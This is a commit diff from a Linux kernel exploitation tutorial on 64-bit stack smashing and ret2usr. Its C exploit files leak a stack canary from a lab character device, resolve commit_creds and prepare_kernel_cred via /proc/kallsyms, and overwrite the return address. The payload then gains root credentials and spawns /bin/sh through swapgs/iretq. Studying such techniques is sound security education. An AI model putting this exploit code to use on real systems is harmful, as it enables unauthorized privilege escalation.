Uploaded example file and source code.

"01.Kernel Address Space Layout Randomization (KASLR)"
"02.Segregation of kernel memory from userspace memory(x86's SMEP/SMAP, ARM's PXN/PAN)"

Changed example files and source code.
"02.Stack smashing(64bit) & Return-to-user(ret2usr)"

Author: Lazenca

03.Linux Kernel Exploitation Tutorial/02.Stack smashing(64bit) & Return-to-user(ret2usr)/address

@@ -9,50 +9,32 @@
 
 #define TEXT_LEN 64
 
-unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
-unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
+void *(*prepare_kernel_cred)(void *) ;
+int (*commit_creds)(void *) ;
 
-unsigned long kallsym_getaddr(const char* str)
+void *kallsym_getaddr(char *name)
 {
-	FILE *stream;
-	char fbuf[256];
-	char addr[32];
-
-	stream = fopen("/proc/kallsyms","r");
-	if(stream < 0)
-	{
-		printf("failed to open /proc/kallsyms\n");
-		return 0;
-	}
-
-	memset(fbuf,0x00,sizeof(fbuf));
-	
-	while(fgets(fbuf,256,stream) != NULL)
-	{
-		char *p = fbuf;
-		char *a = addr;
-
-		if(strlen(fbuf) == 0)
-			continue;
-
-		memset(addr,0x00,sizeof(addr));
-		fbuf[strlen(fbuf)-1] = '\0';
-
-		while(*p != ' ')
-			*a++ = *p++;
-
-		p += 3;
-		if(!strcmp(p,str))
-			return strtoul(addr, NULL, 16);
-	}
-
-	return 0;
+    FILE *fp;
+    void *addr;
+    char sym[512];
+   
+    fp = fopen("/proc/kallsyms", "r");
+    while (fscanf(fp, "%p %*c %512s\n", &addr, sym) > 0) {
+        if (strcmp(sym, name) == 0) {
+            break;
+        }else{
+            addr = NULL;
+        }
+    }
+    fclose(fp);
+    return addr;
 }
 
 int main()
 {
-    static char buf[512],rop[512]; 
-    char canary[8];
+    static char buf[512];
+    size_t rop[512]; 
+    char val[8];
     int fd,i,j;
 
     //Find the address of "commit_creds()"
@@ -90,22 +72,23 @@ int main()
         printf("\n");
     }
 
-    memcpy(canary, buf+48,8);
-    printf("canary is :");
-    for(i = 0;i < 8;i++) printf("%02x ",canary[i] & 0xff);
+    memcpy(val, buf+48,8);
+    size_t canary = ((size_t *)val)[0];
 
-    memset(rop, 0x41, 64);
-    memcpy(rop+64,canary,8);
-    memset(rop+72,'A',8);
-    memset(rop+80,'B',8);
-    memset(rop+88,'C',8);
-    memset(rop+96,'D',8);
-    memset(rop+104,'E',8);
-    memset(rop+112,'F',8);
+    printf("[+]canary: %p\n", (void *)canary);
+ 
+    int k = 8;
+    memset(&rop[0], 0x41, 64);
+    rop[k++] = canary;
+    rop[k++] = 0x4141414141414141; //AAAAAAAA
+    rop[k++] = 0x4242424242424242; //BBBBBBBB
+    rop[k++] = 0x4343434343434343; //CCCCCCCC
+    rop[k++] = 0x4444444444444444; //DDDDDDDD
+    rop[k++] = 0x4545454545454545; //EEEEEEEE
+    rop[k++] = 0x4646464646464646; //FFFFFFFF
+ 
     write(fd, rop, 120);
 
-    write(fd, rop, 104);
-
     if (close(fd) != 0){
         printf("Cannot close.\n");
     }

03.Linux Kernel Exploitation Tutorial/02.Stack smashing(64bit) & Return-to-user(ret2usr)/address.c

@@ -1,30 +1,30 @@
-//gcc -masm=intel -static -o exploit exploit.c
+//gcc -masm=intel -static -o r2u exploit.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <fcntl.h>
 #include <unistd.h>
 #include <errno.h>
 #include <string.h>
 #include <stdint.h>
-  
-#define TEXT_LEN 64
 
-unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
-unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
+#define TEXT_LEN 64
 
+void *(*prepare_kernel_cred)(void *) ;
+int (*commit_creds)(void *) ;
+
 struct trap_frame {
-    void *user_rip ;        // instruction pointer
-    uint64_t user_cs ;       // code segment
-    uint64_t user_rflags ;       // CPU flags
-    void *user_rsp ;        // stack pointer
-    uint64_t user_ss ;       // stack segment
+    void     *user_rip;		// instruction pointer
+    uint64_t user_cs;		// code segment
+    uint64_t user_rflags;	// CPU flags
+    void     *user_rsp;		// stack pointer
+    uint64_t user_ss;		// stack segment
 } __attribute__((packed));
 struct trap_frame tf;
-  
+   
 void getShell(void) {
     execl("/bin/sh", "sh", NULL);
 }
-  
+   
 void prepare_tf(void) {
     asm("mov tf+8, cs;"
         "pushf; pop tf+16;"
@@ -33,59 +33,40 @@ void prepare_tf(void) {
         );
     tf.user_rip = &getShell ;
 }
-   
+    
 void payload(void)
 {
     commit_creds(prepare_kernel_cred(0));
     asm("swapgs;"
-	    "mov %%rsp, %0;"
+	"mov %%rsp, %0;"
         "iretq;"
     : : "r" (&tf));
 }
- 
-unsigned long kallsym_getaddr(const char* str)
+void *kallsym_getaddr(char *name)
 {
-    FILE *stream;
-    char fbuf[256];
-    char addr[32];
- 
-    stream = fopen("/proc/kallsyms","r");
-    if(stream < 0)
-    {
-        printf("failed to open /proc/kallsyms\n");
-        return 0;
-    }
- 
-    memset(fbuf,0x00,sizeof(fbuf));
-     
-    while(fgets(fbuf,256,stream) != NULL)
-    {
-        char *p = fbuf;
-        char *a = addr;
- 
-        if(strlen(fbuf) == 0)
-            continue;
- 
-        memset(addr,0x00,sizeof(addr));
-        fbuf[strlen(fbuf)-1] = '\0';
- 
-        while(*p != ' ')
-            *a++ = *p++;
- 
-        p += 3;
-        if(!strcmp(p,str))
-            return strtoul(addr, NULL, 16);
+    FILE *fp;
+    void *addr;
+    char sym[512];
+   
+    fp = fopen("/proc/kallsyms", "r");
+    while (fscanf(fp, "%p %*c %512s\n", &addr, sym) > 0) {
+        if (strcmp(sym, name) == 0) {
+            break;
+        }else{
+            addr = NULL;
+        }
     }
- 
-    return 0;
+    fclose(fp);
+    return addr;
 }
- 
+
 int main()
 {
-    static char buf[512],rop[512];
-    char canary[8];
+    static char buf[512];
+    size_t rop[512] = {0}; 
+    char val[8];
     int fd,i,j;
-
+ 
     //Find the address of "commit_creds()"
     commit_creds = kallsym_getaddr("commit_creds");
     if(commit_creds == 0)
@@ -94,51 +75,50 @@ int main()
         return 0;
     }
     printf("commit_creds address is :%p\n",commit_creds);
- 
-    //Find the address of "prepare_kernel_cred()"
+
+    //Find the address of "commit_creds()"
     prepare_kernel_cred = kallsym_getaddr("prepare_kernel_cred");
     if(prepare_kernel_cred == 0)
     {
         printf("failed to get prepare_kernel_cred address\n");
         return 0;
     }
-    printf("prepare_kernel_cred address is :%p\n",prepare_kernel_cred);
- 
+    printf("prepare_kernel_cred address is :%p\n",prepare_kernel_cred); 
+
     //leak the canary
     if ((fd = open("/dev/chardev0", O_RDWR)) < 0){
         printf("Cannot open /dev/chardev0. Try again later.\n");
-    return 0;
+	return 0;
     }
- 
-    lseek(fd, 16, SEEK_CUR);
+
+    lseek(fd, 16, SEEK_CUR); 
     read(fd, buf, TEXT_LEN);
- 
+
     for (i = 0; i < 4; i++)
     {
         for (j = 0; j < 16; j++) printf("%02x ", buf[i*16+j] & 0xff);
         printf(" | ");
         for (j = 0; j < 16; j++) printf("%c", buf[i*16+j] & 0xff);
         printf("\n");
     }
+
+    memcpy(val, buf+48,8);
+    size_t canary = ((size_t *)val)[0];
+
+    printf("[+]canary: %p\n", (void *)canary);
 
-    memcpy(canary, buf+48,8);
-    printf("canary is :");
-    for(i = 0;i < 8;i++) printf("%02x ",canary[i] & 0xff);
- 
-    //Exploit code
-    memset(rop, 0x41, 64);
-    memcpy(rop+64,canary,8);
-    memset(rop+72,'A',8);
-    memset(rop+80,'B',8);
-    memset(rop+88,'C',8);
-    *(void**)(rop+96) = &payload;
-    memset(rop+104,'D',8);
+    int k = 8;
+    memset(&rop[0], 0x41, 64);
+    rop[k++] = canary;
+    rop[k++] = 0x4141414141414141; //AAAAAAAA
+    rop[k++] = 0x4242424242424242; //BBBBBBBB
+    rop[k++] = 0x4343434343434343; //CCCCCCCC
+    rop[k++] = (size_t)payload;
 
     prepare_tf();
- 
-    //Overflow
-    write(fd, rop, 104);
- 
+
+    write(fd, rop, 8*k++);
+
     if (close(fd) != 0){
         printf("Cannot close.\n");
     }

03.Linux Kernel Exploitation Tutorial/02.Stack smashing(64bit) & Return-to-user(ret2usr)/exploit

@@ -11,7 +11,7 @@
 int main()
 {
     static char buf[128];
-    char canary[8];
+    char val[8];
     int fd,i,j;
 
     if ((fd = open("/dev/chardev0", O_RDWR)) < 0){
@@ -30,12 +30,10 @@ int main()
         printf("\n");
     }
 
-    memcpy(canary, buf+48,8);
-    printf("canary is :");
-    for(i = 0;i < 8;i++){
-        printf("%02x ",canary[i] & 0xff);
-    }
-    printf("\n");
+    memcpy(val, buf+48,8);
+    size_t canary = ((size_t *)val)[0];
+
+    printf("[+]canary: %p\n", (void *)canary);
 
     if (close(fd) != 0){
         printf("Cannot close.\n");

03.Linux Kernel Exploitation Tutorial/02.Stack smashing(64bit) & Return-to-user(ret2usr)/exploit.c

@@ -1,4 +1,4 @@
-//gcc -static -o overflow Overflow.c
+//gcc -static -o overflow overflow.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <fcntl.h>
@@ -10,8 +10,9 @@
 
 int main()
 {
-    static char buf[512],rop[512]; 
-    char canary[8];
+    static char buf[512];
+    size_t rop[512]; 
+    char val[8];
     int fd,i,j;
 
     if ((fd = open("/dev/chardev0", O_RDWR)) < 0){
@@ -30,19 +31,22 @@ int main()
         printf("\n");
     }
 
-    memcpy(canary, buf+48,8);
-    printf("canary is :");
-    for(i = 0;i < 8;i++) printf("%02x ",canary[i] & 0xff);
+    memcpy(val, buf+48,8);
+    size_t canary = ((size_t *)val)[0];
+
+    printf("[+]canary: %p\n", (void *)canary);
+ 
+    int k = 8;
+    memset(&rop[0], 0x41, 64);
+    rop[k++] = canary;
+    rop[k++] = 0x4141414141414141; //AAAAAAAA
+    rop[k++] = 0x4242424242424242; //BBBBBBBB
+    rop[k++] = 0x4343434343434343; //CCCCCCCC
+    rop[k++] = 0x4444444444444444; //DDDDDDDD
+    rop[k++] = 0x4545454545454545; //EEEEEEEE
+    rop[k++] = 0x4646464646464646; //FFFFFFFF
 
-    memset(rop, 0x41, 64);
-    memcpy(rop+64,canary,8);
-    memset(rop+72,'A',8);
-    memset(rop+80,'B',8);
-    memset(rop+88,'C',8);
-    memset(rop+96,'D',8);
-    memset(rop+104,'E',8);
-    memset(rop+112,'F',8);
-    write(fd, rop, 120);
+    write(fd, rop, 8*k++);
 
     if (close(fd) != 0){
         printf("Cannot close.\n");